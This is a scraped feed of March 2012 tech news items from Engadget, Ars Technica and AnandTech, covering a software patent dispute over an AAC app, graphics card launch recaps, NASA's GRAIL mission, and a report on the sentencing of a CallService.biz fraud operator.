How would you change the Galaxy Tab 7.0 Plus? originally appeared on Engadget on Sun, 25 Mar 2012 22:52:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsEngadget Mobile Podcast 131 - 03.25.2012 originally appeared on Engadget on Sun, 25 Mar 2012 22:13:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsSquare's Card Case rechristened 'Pay with Square,' is first to bring geo-fenced hands-free payments to Android originally appeared on Engadget on Sun, 25 Mar 2012 21:33:00 EDT. Please see our terms for use of feeds.
Permalink |Software patents are hurting the world, but the damage they do is often hard to explain and see.
But Dana Nieder’s post “Goliath v. David, AAC style” has put a face on the invisible scourge of software patents. As she puts it, a software patent has put her “daughter’s voice on the line. Literally. My daughter, Maya, will turn four in May and she can’t speak.” After many tries, the parents found a solution: A simple iPad application called “Speak for Yourself” that implements “augmentative and alternative communication” (AAC). Dana Nieder said, “My kid is learning how to ‘talk.’ It’s breathtaking.”
But now Speak for Yourself is being sued by a big company, Semantic Compaction Systems and Prentke Romich Company (SCS/PRC), who claims that the smaller Speak for Yourself is infringing SCS/PRC’s patents. If SCS/PRC wins their case, the likely outcome is that these small apps will completely disappear, eliminating the voice of countless children. The reason is simple: Money. SCS/PRC can make $9,000 by selling their one of their devices, so they have every incentive to eliminate software applications that cost only a few hundred dollars. Maya cannot even use the $9,000 device, and even if she could, it would be an incredible hardship on a Bronx family with income from a single 6th grade math teacher. In short, if SCS/PRC wins, they will take away the voice of this little girl, who is not yet even four, as well as countless others.
I took a quick look at the complaint, Semantic Compaction Systems, Inc. and Prentke Romich Company, v. Speak for Yourself LLC; Renee Collender, an individual; and Heidi Lostracco, an individual, and it is horrifying at several levels. Point 16 says that the key “invention” is this misleadingly complicated paragraph: “A dynamic keyboard includes a plurality of keys, each with an associated symbol, which are dynamically redefinable to provide access to higher level keyboards. Based on sequenced symbols of keys sequentially activated, certain dynamic categories and subcategories can be accessed and keys corresponding thereto dynamically redefined. Dynamically redefined keys can include embellished symbols and/or newly displayed symbols. These dynamically redefined keys can then provide the user with the ability to easily access both core and fringe vocabulary words in a speech synthesis system.”
Strip away the gobbledygook, and this is a patent for using pictures as menus and sub-menus. This is breathtakingly obvious, and was obvious long before this was patented. Indeed, it would have been obvious to most non-computer people. But this is the problem with many software patents; once software patents were allowed (for many years they were not, and they are still not allowed in many countries), it’s hard to figure out where to end.
One slight hope is that there is finally some effort to curb the worst abuses of the patent system. The Supreme Court decided on March 20, 2012, in Mayo v. Prometheus, that a patent must do more than simply state some law of nature and add the words “apply it.” This was a unanimous decision by the U.S. Supreme Court, remarkable and unusual in itself. You would think this would be obvious, but believe it or not, the lower court actually thought this was fine. We’ve gone through years where just about anything can be patented. By allowing software patents and business patents, the patent and trade office has become swamped with patent applications, often for obvious or already-implemented ideas. Other countries do not allow such abuse, by simply not allowing these kinds of patents in the first place, giving them time to review the rest. See my discussion about software patents for more.
My hope is that these patents are struck down, so that this 3-year-old girl will be allowed to keep her voice. Even better, let’s strike down all the software patents; that would give voice to millions.
Account login services that implement applications from Google, Facebook, and other commercial providers are prone to flaws that allow adversaries unauthorized access to private user profiles on the third-party Websites that use them, a team of computer scientists has concluded.
Their 10-month study found that many SSO, or single sign-on, services supplied by IdPs or ID Providers including Google, Facebook, and PayPal weren't properly integrated into Websites that used the services. As a result, private data on RP, or relying party, sites belonging to Farmville, Freelancer, Nasdaq, Sears, JainRain, and other sites were all vulnerable to snoops.
Read the comments on this post
Inhabitat's Week in Green: supersonic biplane, urban algae farm and magnetic tattoos originally appeared on Engadget on Sun, 25 Mar 2012 20:26:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsDuring the weekend, even Ars takes an occasional break from evaluating third-generation iPads or hypothesizing about Microsoft patents. Weekend Ar(t)s is a chance to share what we're watching/listening/reading or otherwise consuming this week.
Sufjan Stevens is the modern musician for intellectuals. He has the academic background, the intricate orchestral pop, the bevy of nerdy conceptual albums (covering topics from states to holidays, and even bridges). He once included "Decatur" and "Emancipator" within the same rhyme scheme for crying out loud.
Needless to say, news of a new Stevens EP leaked in February and caused much excitement. The project would be a collaborative effort, with Stevens forming a group called s/s/s. That meant initially pairing up with Son Lux, another heavily orchestral indie musician who once wrote an entire album in a single month, and composed for yMusic. No stretch there.
The surprise came from the inclusion of that final "s." It referred to Serengeti—a rapper who happens to share a label with Son Lux. Like many Ars staffers, he calls Chicago home and playfully weaves it into his music. Serengeti's original album referenced things from WCKG to Portillo's. Considering the emcee's affinity for concepts and hyper-referential vocals, perhaps only his musical style would truly be a stretch for Stevens.
Beak & Claw finally debuted this past week and early listens indicate it's a must for any Stevens completionist. Be warned up front: there's no outright orchestral or folk influence here. It's foreign territory for Stevens; a combo of electronica and hip-hop that should raise an eyebrow only on paper. Ultimately these four songs feature all the charming nuances of any of Stevens work, demonstrating that his musical intelligence can transcend genre.
Beak & Claw's first single, "Museum Day," is particularly indicative of this. Serengeti's verse mentions things like "dinosaur museums" and "double, triple dares," while taking a more relaxed tempo than most hip-hop (think Drake in terms of cadence). A very soothing electronic string hook is laid underneath to carry things musically. Stevens blends his own vocals (through vocoder naturally) with this to create a soundcape verging on ambient. During the chorus when he, accompanied by a familiar choir, vocally soars over a cymbal-heavy percussion beat, it's as genuinely beautiful as anything you'd find on Seven Swans.
The rest of this debut s/s/s effort reaches similar heights (possibly even higher ones, my favorite track is embedded above) and leaves a listener wanting more. It's not the first time Sufjan Stevens has been fused with hip-hop (thank Tor and his Illinoize remixes), but it's the first time he's concocted that marriage on his terms. Stevens has always been willing to challenge himself (ambitions of writing albums for all 50 states for instance), but the work of s/s/s shows he's capable of doing it through composition, not just concept. Here's hoping Beak & Claw isn't the last opportunity for that.
Read the comments on this post
Continue reading Refresh Roundup: week of March 19th, 2012
Refresh Roundup: week of March 19th, 2012 originally appeared on Engadget on Sun, 25 Mar 2012 19:14:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsMaybe you're a Dropbox devotee. Or perhaps you really like streaming Sherlock on Netflix. For that, you can thank the cloud.
In fact, it's safe to say that Amazon Web Services (AWS) has become synonymous with cloud computing; it's the platform on which some of the Internet's most popular sites and services are built. But just as cloud computing is used as a simplistic catchall term for a variety of online services, the same can be said for AWS—there's a lot more going on behind the scenes than you might think.
If you've ever wanted to drop terms like EC2 and S3 into casual conversation (and really, who doesn't?) we're going to demystify the most important parts of AWS and show you how Amazon's cloud really works.
Read the comments on this post
An electronics dealer in Oakland, California, said he struggled to break even this year, a far cry from previous iPad releases when he shipped upwards of 1,000 tablets and pocketed profits of $50 to $100 per device sent to his buyer in Hong Kong.The other major factor seems to be an abundance of supply and a simultaneous launch in 10 countries including Hong Kong. As a result, black market prices for the new iPad in China has been falling.
Continue reading Switched On: Tablets are toys. No, really.
Switched On: Tablets are toys. No, really. originally appeared on Engadget on Sun, 25 Mar 2012 17:30:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsTake another look at that picture, and think about what you see. What are we looking at, and what’s all that green stuff?
Pretty easy quiz, right? The paint-by-numbers surface of the Earth has become second nature as satellite photos have entered the globalized world’s vernacular: water is blue, and plants are green.
But does this always have to be the case? Is it possible that plants could be red, or purple, or blue? These questions are more than just sci-fi curiosities - they’re becoming increasingly relevant as exoplanet hunters peer at distant planets, now closer than ever before.
Read the comments on this post
Major ISPs agree to FCC's code of conduct on botnets, DNS attacks originally appeared on Engadget on Sun, 25 Mar 2012 16:13:00 EDT. Please see our terms for use of feeds.
PermalinkThe Web is a powerful publishing platform, but HTML still has some weaknesses as a medium for presenting written content. Browser vendors and other stakeholders are working to remedy those weaknesses by improving the Web's native support for print-quality typography and text layouts.
Adobe is making significant contributions to that effort. A new set of CSS features for advanced text layouts that Adobe developed and proposed for standardization last year are beginning to gain traction. The company's CSS Regions proposal defines a system for creating magazine-style text layouts in Web content.
Read the comments on this post
Documents submitted to the FCC reveal that Sony is preparing to launch a VAIO laptop with Google's Chrome OS operating system. The new Chromebook has an 11.6-inch display, WiFi and Bluetooth connectivity, USB ports, an HDMI output, and SD card slot.
Laptop Reviews, which drew attention to the FCC documents this weekend, believes the system may be powered by an ARM-based processor. They note the documents list the CPU as a T25. That could refer to an NVIDIA Tegra 250 T25, an SoC with a dual-core 1.2GHz Arm Cortex A9. Previous Chromebooks have all used Intel's Atom CPU.
Read the comments on this post
A renovated building in Midtown Atlanta has been awarded 95 out of a possible 110 LEED points for its environmental design-the highest score for any new construction in the Northern Hemisphere.
Though classified as a "New Construction" in the Leadership in Energy and Environmental Design system, 1315 Peachtree Street, Atlanta is actually a 1980s construction that has undergone extensive renovation. But what does LEED certification entail? And is this the greenest building in the Northern Hemisphere?
Read the comments on this post
AT&T Labs, Carnegie Mellon research haptic-feedback steering wheel for turn-by-turn directions originally appeared on Engadget on Sun, 25 Mar 2012 14:56:00 EDT. Please see our terms for use of feeds.
PermalinkHigh-level executives at Google and Oracle were ordered to hold one last round of settlement talks, with the trial over Google's alleged use of Java technology in Android set to begin April 16.
The suit began in August 2010 when Oracle sued Google for patent and copyright infringement over use of the Java programming language in development of Android. Settlement talks have been ordered multiple times, but so far no deal has been made. On Friday, Judge Paul Grewal of US District Court in Northern California ordered Android chief Andy Rubin and Oracle Chief Financial Officer Safra Catz to hold "a further settlement conference" no later than April 9.
Read the comments on this post
Fourth grade students from Emily Dickinson Elementary School in Bozeman, Montana won the contest to rename two NASA spacecrafts. Their prize? The right to choose which parts of the moon the NASA ships would photograph. The images they chose have now been made available by the space agency.
In a perfect storm of bureaucratic literalism and mythopoetic overstatement, the two crafts were formerly called "Gravity Recovery And Interior Laboratory (GRAIL) A and B." The students won the right to direct the craft's MoonKAM (Moon Knowledge Acquired by Middle school students, seriously?) to photograph their choice by slightly purging NASA of its endemic etymological turgidity. The kids' entry for the crafts' new names: Ebb and Flow.
GRAIL was NASA's first planetary mission devoted to education and is directed by the first American woman in space, Sally Ride. The MoonKAM will be used by 2,700 schools in 52 countries over the course of the mission. NASA hopes direct control over a spacecraft (or a sizable chunk of it anyway—the camera) will, in the minds of a generation of school children, turn the moon from an abstraction into something they feel invested in.
"What might seem like just a cool activity for these kids may very well have a profound impact on their futures," Ride said in NASA's announcement. "The students really are excited about MoonKAM, and that translates into an excitement about science and engineering."
Read the comments on this post
You smell uncomfortable and accident prone: What do we rely on our sense of smell for? A new study attempts to find out by surveying a population of 32 individuals who were born without the ability to detect odors (in jargonese, that's "isolated congenital anosmia"). The answers: those without a functional nose tended to be involved in more household accidents, while experiencing "enhanced social insecurity." For the former, many have adopted coping strategies like asking others to determine whether a container of milk has gone bad.
I'm not sure prison is the right place to be testing gender theories: This is a case where an interesting and potentially useful finding is probably being a bit overinterpreted. Some researchers tracked the incidence of sexual violence in state prisons and found that it was lower in states that allowed their inmates conjugal visits. However, they've attempted to broaden that into some sort of grand conclusion about whether rape is a matter of gender-driven power struggles, which is probably stretching the relevance of the results past their breaking point.
Verdi after organ transplants, Enya for day-to-day life: This one had Weirdness written all over it, starting with the title: "Auditory stimulation of opera music induced prolongation of murine cardiac allograft survival and maintained generation of regulatory CD4+CD25+ cells." Yes, some researchers have honestly subjected mice to a heart transplant, and then subjected them to either plain noise, opera, classical music, or Enya. The ones that got Verdi or Mozart handled their transplant better.
There are two things worth pointing out about this study. The first is that various forms of stress are known to alter immune function, and these mice appear to have gotten the music 24 hours a day for a week. So it's not out of the question that there would be some difference in immune response. The second thing is that, should you have a pretentious friend point to this as evidence of the superiority of opera, point out that a reduced immune response isn't considered a great thing if you haven't just had an organ transplant.
This sounds a bit more involved than the average runner's high: Apparently, it might be time to reinterpret some of the grunting you hear at the gym, as there is a population of women out there who sometimes experience what's being termed an "exercise induced orgasm." Generally, this came during a heavy abdominal workout (a pattern that's apparently earned them the term "coregasm"), although some have also had it while bicycling or hiking. The authors note that the women who get them say they don't generally involve any mental sexual imagery, raising questions about whether there's any necessary connection between the orgasm and sexual activity.
Read the comments on this post
What do Samsung and Phones 4u have to show the UK on March 30th? originally appeared on Engadget on Sun, 25 Mar 2012 12:08:00 EDT. Please see our terms for use of feeds.
PermalinkHarry Potter Wizards Collection brings home all eight movies on a ridiculous 31 discs (video) originally appeared on Engadget on Sun, 25 Mar 2012 10:54:00 EDT. Please see our terms for use of feeds.
Permalink |NRG to bring 200 fast-charging EV stations to the Golden State, pump $100 million into CA infrastructure originally appeared on Engadget on Sun, 25 Mar 2012 07:35:00 EDT. Please see our terms for use of feeds.
PermalinkSky Anytime+ now available via all broadband providers originally appeared on Engadget on Sun, 25 Mar 2012 04:22:00 EDT. Please see our terms for use of feeds.
Permalink |“Everyone’s scrambling to get something into place,” said Victor Rubba, chief executive of Fluik, a Canadian developer that makes games like Office Jerk and Plumber Crack. “We’re trying to be proactive and we’ve already moved to an alternative scheme.” Rubba said he isn’t sending any updates until he sees how the situation shakes out in the next few days.The reason for the phasing out of UDIDs from developer use is due to increased pressure on Apple due to the privacy implications. Apple and several App developers have been sued over the use of the UDID to track users across different apps. While the UDID doesn't specifically identify a user, the sharing of UDIDs across ad networks and apps can help piece together a valuable picture of activity and interests of the user of a specific device. Apple seems to be requiring apps to generate their own unique identifiers for each installation to avoid this ability to share such information across apps.
Could Fido be joining the Canadian LTE club? originally appeared on Engadget on Sun, 25 Mar 2012 00:57:00 EDT. Please see our terms for use of feeds.
Permalink |It's an interesting request and that's why we're here: solving those problems that three minutes on Google just can't. So, dear friends, what say you? Wish the soon-to-be-wed couple all the best by adding a helpful solution to the comment feed and spread a little joy."Hi guys. I'm getting married in a church with a weird split-hall design. The result is that half of the attendees won't be able to see the ceremony at all! I'm wondering if I could hook up my Canon Rebel T3i up to my 3rd-generation iPad and use it as a quick-and-dirty closed-circuit display? There's no WiFi in the location, so it has to be a wired solution too. Please help me!"
Ask Engadget: using an iPad as a remote viewfinder? originally appeared on Engadget on Sat, 24 Mar 2012 22:55:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsIf the numbers are true, then most of you have already read our Kepler review, and you know that the card has made quite a splash - it's the highest-performing single-GPU card you can buy today, and it's got solid power consumption and a lower price than the AMD Radeon HD 7970 to boot. Kepler still needs to trickle down through the rest of NVIDIA's lineup, but for now NVIDIA has the high-end sewn up. Let's look at what its partners have put together.
ASUS | EVGA |
Galaxy |
Gigabyte | |
Part Number | GTX680-2GD5 | 02G-P4-2680-KR | 68NPH6DV5ZGX | GV-N680D5-2GD-B |
Core Clock | 1006 MHz | 1006 MHz | 1006 MHz | 1006 MHz |
Memory Clock (Effective) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) |
Boost Clock | 1058 MHz | 1058 MHz | 1058 MHz | 1058 MHz |
Dimensions in inches (dimensions in mm) | 10.08 x 4.37 x 1.47 (256.03 x 111.00 x 33.34) | 10 x 4.38 x ?? (254 x 111.25 x ??) | 10 x 4.33 x 1.57 (254 x 109.98 x 39.88) | 10.83 x 4.96 x 1.50 (275 x 126 x 38) |
Outputs | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D |
Included accessories | 4-pin to 6-pin | DVI to VGA, 2x 4-pin to 6-pin | 2x DVI to VGA, 2x 4-pin to 6-pin | 2x 4-pin to 6-pin |
Warranty | 3-year | 3-year | 3-year | 3-year |
Price (Newegg) | $499.99 | $499.99 | $499.99 | $499.99 |
MSI |
PNY | Zotac | |
Part Number | N680GTX-PM2D2GD5 | VCGGTX680XPB | ZT-60101-10P |
Core Clock | 1006 MHz | 1006 MHz | 1006 MHz |
Memory Clock (Effective) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) |
Boost Clock | 1058 MHz | 1058 MHz | 1058 MHz |
Dimensions in inches (dimensions in mm) | 10.63 x 4.38 x 1.53 (270 x 111.15 x 38.75) | ??? | 11.10 x 4.9 x 2.3 (281.9 x 124.46 x 58.42) |
Outputs | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D |
Included accessories | DVI to VGA, 4-pin to 6-pin | DVI to VGA, 4-pin to 6-pin, HDMI cable | DVI to VGA, 2x 4-pin to 6-pin |
Warranty | 3-year parts/2-year labor | 1-year (Lifetime with registration) | 2-year |
Price (Newegg) | $499.99 | $529.99 | $499.99 |
As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.
Common to all of these cards is 2GB of GDDR5 on a 256-bit bus and all of Kepler's features - in fact, most of these cards have pretty much everything in common with one another, from the across-the-board stock clocks to the display outputs to the single-fan, dual-slot coolers to the lackluster bundles of accessories. This isn't uncommon with high-end launches of all-new architectures - we saw the same thing happen in our Radeon HD 7970 launch recap, another crop of cards that stuck to the reference design.
As such, there's not a ton to say about them, so I'll just make notes below when there's something about the card that makes it different from the stock card that we reviewed a couple of days ago.
MSI's graphics cards usually have a 3-year parts and 2-year labor warranty, and this card is no exception.
This card is the only one in the lineup that costs more than $500, and there are a couple of reasons why: one is the lifetime warranty you can get by registering the card, and the other is the bundled HDMI cable. It's the only card in the lineup with anything more than power cables and DVI to VGA adapters. It's also the only card for which I can't find measurements (Amazon lists the length at eight inches, which I find suspect since the rest of the cards are at least ten). The card's dimensions should be similar to the others.
Zotac's is the only card in this lineup with a 2-year warranty instead of the 3-year warranty shared by most of the rest of them.
Instagram opens signup page for Android port, release date still unknown originally appeared on Engadget on Sat, 24 Mar 2012 20:41:00 EDT. Please see our terms for use of feeds.
PermalinkIt has been a couple of weeks since we reviewed the Radeon HD 7800 series, but as we mentioned earlier this week and in our 7850 recap, that was just a paper launch - the cards hit the street only recently, and as usual we're going to go through all of the stuff from AMD's partners and give you the Facts.
ASUS | Gigabyte | MSI |
PowerColor |
|
Part Number | HD7870-DC2-2GD5 | GV-R787OC-2GD |
R7870 Twin Frozr 2GD5/OC |
AX7870 2GBD5-2DH |
Core Clock | 1010 MHz | 1100 MHz | 1050 MHz | 1000 MHz |
Memory Clock (Effective) | 1210 MHz (4840 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) |
Dimensions in inches (dimensions in mm) | 10.16 x 5.12 x 1.7 (258.06 x 130.05 x 43.18) | 11.02 x 5.28 x 1.67 (280 x 134 x 42.5) | 10.63 x 4.65 x 1.65 (270 x 118 x 42) | 9.5 x 4.38 x 1.50 (241.3 x 111.2 x 38) |
Outputs | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I |
Included accessories | DVI to VGA adapter, 6-pin extension cable, Crossfire bridge | 2x 4-pin to 6-pin, Crossfire bridge | Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Mini DP to DP, HDMI to DVI |
Warranty | 3-year | 3-year | 3-year parts/2-year labor | 2-year |
Price (Newegg) | $359.99 | $359.99 | $369.99 | $359.99 |
PowerColor PCS+ | Sapphire | Sapphire OC | |
Part Number | AX7870 2GBD5-2DHPP | 11199-00-20G |
11199-03-20G |
Core Clock | 1100 MHz | 1000 MHz | 1050 MHz |
Memory Clock (Effective) | 1225 MHz (4900 MHz) | 1200 MHz (4800 MHz) | 1250 MHz (5000 MHz) |
Dimensions in inches (dimensions in mm) | 9.5 x 4.38 x 1.50 (241.3 x 111.2 x 38) | 10.24 x 4.45 x 1.38 (260 x 113 x 35) | 10.24 x 4.45 x 1.38 (260 x 113 x 35) |
Outputs | 2x Mini DisplayPort, HDMI, 2x DVI-I | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I |
Included accessories | DVI to VGA, Mini DP to DP, Crossfire bridge | DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge |
Warranty | 2-year | 2-year | 2-year |
Price (Newegg) | $369.99 | $349.99 | $359.99 |
As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.
Common to all of these cards is 2GB of GDDR5 on a 256-bit bus, Eyefinity support, two 6-pin power connectors, and all of GCN's features. All but one of the cards also offer identical outputs: two mini DisplayPorts, one HDMI port, and one DVI-I port. The PowerColor PCS+ card also offers a second DVI-I output.
ASUS again uses its DirectCUII cooler on its 7870 - this cooler has made appearances in many of our other launch recaps, including that for the 7850, where the cooler was actually a good bit longer than the card itself. Since the 7870 is a longer card, that isn't an issue here. As with its 7850, ASUS applies a paltry 10MHz overclock to the core and the memory, but the bundled accessories are nothing to write home about - the biggest reason to choose this card over others is the 3-year warranty.
Gigabyte's 7870 employs a massive three-fan cooler, the better to cool its 100MHz (10%) core overclock, which is the highest clock in our recap - it's tied with one of the PowerColor cards, and while that one is $10 more expensive, it also has a slight memory overclock. The Gigabyte card's memory remains at stock clocks - if you've been following these recaps for awhile, you've probably noticed that factory overclocks tend to focus on the core rather than the memory - only three of the seven cards here have memory cards, and none of them are higher than 4%.
Like many of the cards here, MSI's 7870 has a two-fan cooler with a big heatsink, but otherwise it has a hard time distinguishing itself from the crowd - it's tied for the most expensive card, but it has only a modest 50MHz core overclock and a three-year parts and two-year labor warranty that falls in the middle of the rest of the pack.
As is often the case in these recaps, both PowerColor and Sapphire are offering two versions of the 7870, one with stock clocks and a slightly more expensive model with a factory overclock. This is the stock clocked version, and it's the only card in this lineup that uses AMD's reference cooler for the 7870 series.
This PowerColor card is $10 more expensive than its lower-end cousin, but it comes with a 100MHz core overclock and 25MHz memory overclock that should net you an increase in frames per second. Its also the only card here with a second DVI port, which it adds to the 7870's standard complement of Mini DisplayPorts and HDMI. If you value warranty length over factory overclocks, though, this one only has a two-year warranty to its name.
This card has the same stock clocks and 2-year warranty as the PowerColor card, but it's $10 cheaper (the cheapest card in the recap), includes a better accessory bundle, and uses a two-fan cooler with a more impressive heatsink.
This card is identical to the other Sapphire offering in almost every way - the warranty, included accessories, and cooler are all the same. Your extra $10 gets you a 50 MHz overclock on both the core and the memory - if you're not comfortable doing your own overclocks, you can spend the extra $10 and get a few frames per second for it. If you do your own overclocks, save the cash.
XBMC Eden officially steps out of beta, available for download now originally appeared on Engadget on Sat, 24 Mar 2012 20:12:00 EDT. Please see our terms for use of feeds.
Permalink |It has been weeks since we reviewed AMD's Radeon HD 7870 and 7850 cards, but unlike the 7900 and 7700 series cards, the 7800 series was given the typical middle-child treatment and paper launched. and cards began appearing at retailers just this week.
While Kepler's launch has cast a long shadow over the top end of the graphics market (a GTX 680 recap is coming later today, dont worry), but competition is still fierce, and as we noted in our review the 7850 is a solid performer and the fastest 150 watt card on the market today. Let's look at what AMD's partners have for us.
ASUS | Gigabyte | HIS | MSI |
PowerColor |
Sapphire | |
Part Number | HD7850-DC2-2GD5 | GV-R785OC-2GD |
H785F2G2M |
R7850 Twin Frozr 2GD5/OC | AX7850 2GBD5-2DH | 11200-01-20G |
Core Clock | 870 MHz | 975 MHz | 860 MHz | 900 MHz | 860 MHz | 920 MHz |
Memory Clock (Effective) | 1210 MHz (4840 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1250 MHz (5000 MHz) |
Dimensions in inches (dimensions in mm) | 10.2 x 4.5 x 1.7 (259.08 x 114.3 x 43.18) | 9.49 x 5.39 x 1.67 (241 x 137 x 42.5) | ??? | 7.76 x 4.37 x 1.50 (197 x 111 x 38) | 7.99 x 4.37 x 1.50 (203 x 111 x 38) | 8.27 x 4.13 x 1.38 (210 x 105 x 35) |
Included accessories | DVI to VGA, Crossfire bridge | 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Crossfire bridge | DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Mini DP to DP, HDMI to DVI | DVI to VGA, Mini DP to DP, 4-pin to 6-pin, Crossfire bridge |
Warranty | 3-year | 3-year | 2-year | 3-year parts/2-year labor | 2-year | 2-year |
Price (Newegg) | $259.99 | $259.99 | $259.99 | $259.99 | $259.99 | $259.99 |
As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.
Common to all of these cards is 2GB of GDDR5 on a 256-bit bus, Eyefinity support, and all of GCN's features. All cards also offer identical outputs: two mini DisplayPorts, one HDMI port, and one DVI-I port. Normally we see a range of prices from different manufacturers due to factory overclocks, longer warranties, or included accessories, but in this case we've got identical prices across the board, making it much easier to make an apples-to-apples comparison among cards. As long as you don't have any particular brand loyalty, just pick the one with the value-added extras that you need the most.
The ASUS 7850 features a 10MHz overclock on both the GPU and the RAM, but it's so small that it won't increase framerates much at all over stock clocks. Its bundle of accessories is pretty sparse, but its 3-year warranty is tied with the Gigabyte card for the longest of the bunch.
This ASUS card's defining characteristic is the DirectCUII cooler, a huge two-fan cooler that was actually designed for longer cards like the Radeon HD 7950. On the shorter 7850, it hangs over the end of the card by quite a bit, requiring the use of an extension cord to make the 6-pin power connection accessible. This move may make the GPU cooler (and, by extension, get you a better overclock), but it will also require a larger case.
The Gigabyte card has a bit in common with the ASUS card - a big fancy two-fan cooler, a 3-year warranty, a bare accessory bundle - but it's a bit shorter in length, and it features an impressive 115MHz (about 12%) overclock on the core, which should actually net you a measurable increase in game performance. The memory clock , however, is left at stock.
Here's a first in AnandTech Graphics Card Launch Recap History: the dimensions for this HIS card aren't available through Newegg or HIS's product page, or anywhere else that I can find (the product page gives "box dimensions", which is useful if you're shipping the card but not if you're using it). Luckily, its humdrum single-fan cooler means that the card should be unremarkable in this regard - I'd guess it should be close to eight inches long.
Otherwise, HIS doesn't give you much in terms of value-adds - it uses stock clocks, the two-year warranty is the minimum I like to see on components that cost this much, and the DVI to VGA adapter and Crossfire bridge constitute a pretty small accessory bundle.
With the MSI card, we're back to custom two-fan coolers and big heatsinks. A 40MHz (~4.5%) core overclock is respectable but small, and it uses stock memory clocks. A 3-year parts and 2-year labor warranty splits the difference between the longest and shortest warranties on the list.
Where MSI beats the competition is in its accessory bundle, which is actually worthy of the name - in addition to basics like power cable adapters (the Newegg product image appears to include two of these, though it only has the one six pin power plug on the back) and a DVI to VGA adapter, it also includes a Mini DisplayPort to DisplayPort adapter.
The PowerColor card is a lot like the HIS model in its single-fan cooler, 2-year warranty, and stock clocks, but it adds some useful display adapters to the package. PowerColor's card is the only one here that's using AMD's reference cooler for the 7850 series (visible on this page of our review).
Sapphire's take on the 7850, which uses another big two-fan cooler, is the only one in the list with a memory overclock worthy of the name. The 50MHz (4%) RAM overclock along with the 60MHz (6.5%) core overclock should give you a noticeable increase in framerates if you're not comfortable doing your own overclocking. Other benefits include the respectable accessory bundle and other drawbacks include a shorter 2-year warranty.
Continue reading Mobile Miscellany: week of March 19th, 2012
Mobile Miscellany: week of March 19th, 2012 originally appeared on Engadget on Sat, 24 Mar 2012 19:27:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsWorld's largest telescope underway, scientists definitely observe big bang originally appeared on Engadget on Sat, 24 Mar 2012 17:10:00 EDT. Please see our terms for use of feeds.
PermalinkArs Technica's beginnings are rooted in a community that has always tinkered, built, and modded computer hardware. As it has evolved, the do-it-yourself philosophy has also triggered other communities that make their own stuff. Most recently, the "make movement" has made a name for itself in the world of open source hardware and hacking. The movement covers a broad range of interests, edging into some hardcore do-it-yourself projects. Some groups meet in hackerspaces, but the movement at large seems mostly based on the spirit of building things yourself or with other people.
Read the comments on this post
A Belarusian who operated a rent-an-accomplice business for bank thieves has been sentenced to 33 months in prison in New York.
Dmitry Naskovets pleaded guilty to operating CallService.biz, a Russian-language site for identity criminals who trafficked in stolen bank-account data and other information.
Naskovets was arrested in 2010 in the Czech Republic at the request of US authorities and subsequently extradited to the US. A co-conspirator named Sergey Semashko was arrested the same day in Belarus and has been charged there.
According to authorities, the two launched their site in Lithuania in June 2007 and filled a much-needed niche in the criminal world—providing English- and German-speaking "stand-ins" to help crooks thwart bank security screening measures.
In order to conduct certain transactions—such as initiating wire transfers, unblocking accounts or changing the contact information on an account—some financial institutions require the legitimate account holder to authorize the transaction by phone.
Thieves could provide the stolen account information and biographical information of the account holder to CallService.biz, along with instructions about what needed to be authorized. The biographical information sometimes included the account holder’s name, address, Social Security number, e-mail address and answers to security questions the financial institution might ask, such as the age of the victim’s father when the victim was born, the nickname of the victim’s oldest sibling, or the city where the victim was married.
More than 2,000 identity thieves used the service to commit more than 5,000 acts of fraud, according to authorities.
"Through his website, Dimitry Naskovets served as the middleman for a network of identity thieves who used his many employees to impersonate thousands of victims in exchange for a stake in the profits from the fraudulent transactions they helped facilitate," Manhattan US Attorney Preet Bharara said in a statement. "This case is another example of how cybercrime knows no geographic boundaries and of how we will work with our partners in the United States and around the world to catch and punish cyber criminals."
The thieves obtained the information through phishing attacks and malware placed on victims’ computers to log their keystrokes.
CallService.biz would then assign someone who matched the legitimate account holder’s gender and was proficient in the needed language. That person would pose as the account holder and call the financial institution to authorize the fraudulent transaction.
